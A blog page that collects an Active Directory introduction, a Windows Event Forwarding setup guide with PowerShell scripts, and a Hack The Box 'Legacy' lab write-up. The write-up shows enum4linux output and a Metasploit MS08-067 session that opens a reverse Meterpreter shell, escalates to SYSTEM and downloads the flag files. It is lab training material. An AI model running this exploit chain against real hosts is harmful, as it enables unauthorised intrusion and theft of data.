Attacking and Defending Active Directory Part I

Introduction

Microsoft Active Directory is one of the most interesting services to attack: simply checking whether the server is misconfigured can let us enumerate a treasure trove of information such as domain users, administrative shares, password policies and much more.

In this series, I will be separating this into three parts. The first part will include the introduction of Active Directory and its components.

The second part will include different types of attacks against Active Directory and the demonstration on how to execute these attacks.

And lastly, we’ll be covering different approaches in defending and reducing attack surfaces of Active Directory.

What is Active Directory?

Active Directory or AD is a centralized Windows OS directory service that stores information about objects on the network and automates the management of user data, security, and distributed resources.

Active Directory Components

Just to give you an overview of the different components of Active Directory, the Active Directory consists of:

  • Domains
  • Forests
  • Sites
  • Domain Controllers
  • Organizational Units (OU)

Each of these components has its own purpose that enables Active Directory to function within an organization.

I will just summarize the meanings and functions of these components but you can read more about Active Directory on the official documentation of Microsoft.

Domains

Active Directory domains are where the users and computers are located. Each domain holds a database that contains the information of an object’s identity.

For example, I have an AD domain called internal.anotsodev.org. This domain contains all the information of users and computers joined in this domain.

Forests

Active Directory forests are the topmost logical containers of the hierarchy. The illustration below shows the organizational domain forest model of internal.anotsodev.org.

Sites

Active Directory sites let users authenticate with the nearest domain controller and determine the domain preference, either administrative or least privilege, applied to the currently logged-in user.

Sites are organized into one or more IP subnets based on the geographic location of the users joined to the domain.

Domain Controllers

Active Directory domain controllers handle authentication requests and verify whether users have access to domain resources. Domain users’ preferences and permissions are defined via Group Policy applied through the domain controller.

Organizational Unit (OU)

An organizational unit (OU) is a subdivision within an Active Directory into which you can place users, groups, computers, and other organizational units. You can create organizational units to mirror your organization’s functional or business structure. Each domain can implement its own organizational unit hierarchy. If your organization contains several domains, you can create organizational unit structures in each domain that are independent of the structures in the other domains.
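To see how the components above fit together on a real domain, here is an added example (not from the original post) that lists the forest, its domains, sites, domain controllers and OUs from a domain-joined machine using the .NET System.DirectoryServices classes; it assumes it is run in PowerShell as an ordinary domain user and is read-only.

```powershell
# Added example: walk the Active Directory components described in the post
# (forest -> domains -> sites -> domain controllers, plus OUs) using .NET classes
# that need no RSAT module. Read-only; shows only what the current user may see.
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$forest = $domain.Forest

"Forest : $($forest.Name) (root domain: $($forest.RootDomain.Name))"
"Domains in this forest:"
$forest.Domains | ForEach-Object { "  $($_.Name) [mode: $($_.DomainMode)]" }

# Sites are defined by IP subnets; each DC belongs to exactly one site.
"Sites and their subnets:"
foreach ($site in $forest.Sites) {
    $subnets = ($site.Subnets | ForEach-Object { $_.Name }) -join ', '
    "  $($site.Name): $subnets"
}

"Domain controllers for $($domain.Name):"
$domain.DomainControllers | ForEach-Object {
    "  $($_.Name)  IP=$($_.IPAddress)  site=$($_.SiteName)  roles=$($_.Roles -join '/')"
}

# OUs are not exposed by the Domain class, so query them with an LDAP search
# rooted at the domain's default naming context.
$root     = $domain.GetDirectoryEntry()
$searcher = New-Object System.DirectoryServices.DirectorySearcher($root, '(objectClass=organizationalUnit)')
$searcher.PropertiesToLoad.Add('distinguishedName') | Out-Null
"Organizational Units:"
$searcher.FindAll() | ForEach-Object { "  $($_.Properties['distinguishedname'][0])" }
```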


So that ends the first part of the “Attacking and Defending Active Directory” series.

I will be posting the second part of this series, which covers the actual attacks used against Active Directory, next week.

Stay tuned and be safe!

Subscribe for more!

To stay up to date with my latest posts and more InfoSec guides, make sure to subscribe to this blog by entering your email address below.

I promise I won’t be spamming your mailbox. Because no one loves spam. AMIRIGHT?

Poor man’s log collection on Windows

Introduction

As your organization grows, more and more log collectors, commercial or free, need to be installed on your network to gather logs from the various servers running Windows or *nix.

Let’s say, for example, that an organization called kyle.biz has deployed ArcSight SmartConnectors on Linux servers to collect Windows event logs. Based on my experience, setting up SmartConnectors is tedious and maintaining them is sometimes a pain.

We also ran into a limitation: a SmartConnector only collects logs from the static server IPs configured during installation, so there is no way to get logs from other machines that have dynamic IPs.

While researching, our team stumbled upon this article from Microsoft’s documentation and saw that Windows already has a built-in log forwarding feature that is powerful and easy to configure!

So without further ado, let’s configure source-initiated forwarding with a Windows Event Collector (WEC) and Windows Event Forwarding (WEF) on our servers!

Prerequisites

Windows Event Collector

  • OS: Windows Server 2016 
  • Hostname: WEC01.internal.kyle.biz
  • RAM: 16GB
  • CPU: 4 Cores
  • Storage:
    • Drive C:\ – 50GB
    • Drive D:\ – 60GB (we’ll save our forwarded logs here)
  • Joined to a domain.

Windows Event Source

  • OS: Windows Server 2016
  • Hostname: CONSOLESERVER01.internal.kyle.biz
  • Joined to a domain.

WEC Server Configuration

In the following steps, we’ll configure our collector server to receive logs from subscriptions initiated by the source computers.

Step 1: Open the Event Viewer and click Subscriptions.

Step 2: Right-click Subscriptions to create a new subscription. You can also see the other actions in the right pane of the window.

Step 3: Enter the subscription name and select the subscription type as Source computer initiated.

Before we proceed in adding computer groups, let’s first configure the events to collect and advanced settings.

Step 4: Click Select Events, switch to the XML tab, tick the option to edit the query manually, and paste the XML query from here: Appendix E – Annotated baseline subscription event query

Step 5: Click OK

Step 6: Click Advanced and select Minimize Latency.

Step 7: Click OK

Step 8: We’ll now add our domain computers by clicking Select Computer Groups.

Step 9: Since we are joined to a domain, click Add Domain Computers and search for the hostname of the event source (e.g. CONSOLESERVER01.internal.kyle.biz).

Step 10: Click OK

Step 11: Right-click Forwarded Events and click Properties.

Step 12: Create the folder Winevt\Logs on drive D:\, then replace the log path with D:\Winevt\Logs\ForwardedEvents.evtx, or refer to the screenshot below.

Event Source Configuration

In the following steps, we’ll configure the source computers to forward logs to our collector server.

Step 1: Let’s now configure our event source server to point its Subscription Manager at our WEC.

Step 2: Open the Local Group Policy Editor and click the Event Forwarding node to see the settings under it.

Step 3: Click Configure target Subscription Manager and enter the following value:

"Server=http://WEC01.internal.kyle.biz:5985/wsman/SubscriptionManager/WEC,Refresh=60"

Step 4: Click OK

Step 5: Open Command Prompt and enter gpupdate /force to apply the change to our local group policy.

Step 6: Press Enter

Step 7: Go back to the WEC server and check whether the Baseline subscription is already receiving logs from our event source machine.

Step 8: We can see that the events are being forwarded and are ready for analysis.
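The same two-sided setup, condensed into a script that applies the source setting and then verifies both ends. This is an added example, not part of the original post; it assumes the subscription created in Step 3 was named Baseline, uses the hostnames from the prerequisites, and that the source machine has an up-to-date local policy key (the assumed event IDs in the forwarder log are noted in the comments).

```powershell
# Added example (not from the original post): configure and verify source-initiated WEF.
# Assumed names: collector WEC01.internal.kyle.biz, subscription "Baseline".
$Collector        = 'WEC01.internal.kyle.biz'
$SubscriptionName = 'Baseline'

# ----- Event source side (run on CONSOLESERVER01) -------------------------------
# Same setting as "Configure target Subscription Manager" in Local Group Policy,
# written directly to the policy registry key (handy when no domain GPO exists).
$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager'
New-Item -Path $PolicyKey -Force | Out-Null
Set-ItemProperty -Path $PolicyKey -Name '1' -Type String `
    -Value "Server=http://${Collector}:5985/wsman/SubscriptionManager/WEC,Refresh=60"

# WinRM must be listening, and NETWORK SERVICE (the account the forwarder runs as)
# needs read access to the Security log, otherwise those events never leave the box.
winrm quickconfig -q
Add-LocalGroupMember -Group 'Event Log Readers' -Member 'NT AUTHORITY\NETWORK SERVICE' `
    -ErrorAction SilentlyContinue
gpupdate /force | Out-Null

# The forwarder records its contact with the collector here. Assumed IDs: 100 means
# the subscription was received; 101/105 indicate it could not be created or the
# collector was unreachable (check WinRM, DNS and the Refresh URL first).
Get-WinEvent -LogName 'Microsoft-Windows-Forwarding/Operational' -MaxEvents 5 |
    Select-Object TimeCreated, Id, Message | Format-List

# ----- Collector side (run on WEC01) --------------------------------------------
# Make sure the collector service is configured, then show the subscription and the
# runtime status of every source that has checked in (last heartbeat, errors).
wecutil qc /q
wecutil gs $SubscriptionName
wecutil gr $SubscriptionName

# Confirm events are landing in the relocated log (D:\Winevt\Logs\ForwardedEvents.evtx).
Get-WinEvent -LogName 'ForwardedEvents' -MaxEvents 5 |
    Select-Object TimeCreated, MachineName, Id, ProviderName
```

If `wecutil gr` lists the source with a status other than Active, the forwarder log on the source usually names the cause before the collector does.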

So that’s it! I hope you learned something new today and that you’ll use this example to close the gap and gain greater visibility into your network.


Hack the Box Legacy Get System no Jutsu

This post contains the actual commands I used to hack the HTB Legacy box and get the user and root hashes.

Enumeration

kaipowered@debian:~/Downloads/enum4linux-0.8.9/enum4linux-0.8.9$ sudo ./enum4linux.pl -a 10.10.10.4
[sudo] password for kaipowered:
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul 18 22:42:06 2017

==========================
| Target Information |
==========================
Target ........... 10.10.10.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

==================================================
| Enumerating Workgroup/Domain on 10.10.10.4 |
==================================================
[+] Got domain/workgroup name: HTB

==========================================
| Nbtstat Information for 10.10.10.4 |
==========================================
Looking up status of 10.10.10.4
LEGACY <00> - B <ACTIVE> Workstation Service
HTB <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
LEGACY <20> - B <ACTIVE> File Server Service
HTB <1e> - <GROUP> B <ACTIVE> Browser Service Elections
HTB <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser

MAC Address = 00-50-56-97-0E-E1

===================================
| Session Check on 10.10.10.4 |
===================================
[+] Server 10.10.10.4 allows sessions using username '', password ''

=========================================
| Getting domain SID for 10.10.10.4 |
=========================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid from server
error: NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

====================================
| OS information on 10.10.10.4 |
====================================
[+] Got OS info for 10.10.10.4 from smbclient: Domain=[LEGACY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
[E] Can't get OS info with srvinfo: NT_STATUS_ACCESS_DENIED

===========================
| Users on 10.10.10.4 |
===========================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

=======================================
| Share Enumeration on 10.10.10.4 |
=======================================
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 10.10.10.4

==================================================
| Password Policy Information for 10.10.10.4 |
==================================================
[E] Unexpected error from polenum.py:
Traceback (most recent call last):
File "/usr/local/bin/polenum.py", line 32, in <module>
from impacket import uuid
ImportError: No module named impacket
[E] Failed to get password policy with rpcclient

============================
| Groups on 10.10.10.4 |
============================

[+] Getting builtin groups:
[E] Can't get builtin groups: NT_STATUS_ACCESS_DENIED

[+] Getting builtin group memberships:

[+] Getting local groups:
[E] Can't get local groups: NT_STATUS_ACCESS_DENIED

[+] Getting local group memberships:

[+] Getting domain groups:
[E] Can't get domain groups: NT_STATUS_ACCESS_DENIED

[+] Getting domain group memberships:

=====================================================================
| Users on 10.10.10.4 via RID cycling (RIDS: 500-550,1000-1050) |
=====================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

===========================================
| Getting printer info for 10.10.10.4 |
===========================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid from server
error: NT_STATUS_ACCESS_DENIED

enum4linux complete on Tue Jul 18 22:42:49 2017

Exploitation and Post Exploitation

msf exploit(ms06_040_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.15.172:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (956991 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.15.172:4444 -> 10.10.10.4:1028) at 2017-07-18 22:26:33 +0800

meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 1512 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd c:\Users
cd c:\Users
The system cannot find the path specified.

C:\WINDOWS\system32>cd C
cd C
The system cannot find the path specified.

C:\WINDOWS\system32>cd C:\
cd C:\

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\

16/03/2017 08:30 0 AUTOEXEC.BAT
16/03/2017 08:30 0 CONFIG.SYS
16/03/2017 09:07 <DIR> Documents and Settings
16/03/2017 08:33 <DIR> Program Files
16/03/2017 08:33 <DIR> WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.488.408.064 bytes free

C:\>cd WINDOWS
cd WINDOWS

C:\WINDOWS>cd ..
cd ..

C:\>cd "Documents and Settings"
cd "Documents and Settings"

C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings

16/03/2017 09:07 <DIR> .
16/03/2017 09:07 <DIR> ..
16/03/2017 09:07 <DIR> Administrator
16/03/2017 08:29 <DIR> All Users
16/03/2017 08:33 <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings>cd john
cd john

C:\Documents and Settings\john>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings\john

16/03/2017 08:33 <DIR> .
16/03/2017 08:33 <DIR> ..
16/03/2017 09:19 <DIR> Desktop
16/03/2017 08:33 <DIR> Favorites
16/03/2017 08:33 <DIR> My Documents
16/03/2017 08:20 <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings\john>cd Desktop
cd Desktop

C:\Documents and Settings\john\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings\john\Desktop

16/03/2017 09:19 <DIR> .
16/03/2017 09:19 <DIR> ..
16/03/2017 09:19 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings\john\Desktop>edit user.txt
edit user.txt
^C
Terminate channel 1? [y/N] y
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd C:\Documents and Settings\john\Desktop
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd C:
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > lpwd
/home/kaipowered/Documents/HTB
meterpreter > cd C:\
meterpreter > pwd
C:\
meterpreter > cd "Documents and Settings"
meterpreter > pwd
C:\Documents and Settings
meterpreter > cd john
meterpreter > cd Desktop
meterpreter > download user.txt
[*] Downloading: user.txt -> user.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): user.txt -> user.txt
[*] download : user.txt -> user.txt
meterpreter > pwd
C:\Documents and Settings\john\Desktop
meterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\Documents and Settings
meterpreter > dir
Listing: C:\Documents and Settings
==================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 14:07:21 +0800 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 13:29:48 +0800 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 13:33:37 +0800 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:52 +0800 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:43 +0800 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 13:33:42 +0800 john

meterpreter > cd Administrator
meterpreter > dir
Listing: C:\Documents and Settings\Administrator
================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:29 +0800 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:27 +0800 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 14:18:27 +0800 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:32 +0800 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:31 +0800 My Documents
100666/rw-rw-rw- 524288 fil 2017-05-11 06:31:16 +0800 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-07-24 00:18:53 +0800 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:31 +0800 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:24 +0800 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 13:20:48 +0800 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 13:28:41 +0800 Templates
100666/rw-rw-rw- 178 fil 2017-05-11 06:31:16 +0800 ntuser.ini

meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 32 fil 2017-03-16 14:18:50 +0800 root.txt

meterpreter > download root.txt
[*] Downloading: root.txt -> root.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): root.txt -> root.txt
[*] download : root.txt -> root.txt
meterpreter >
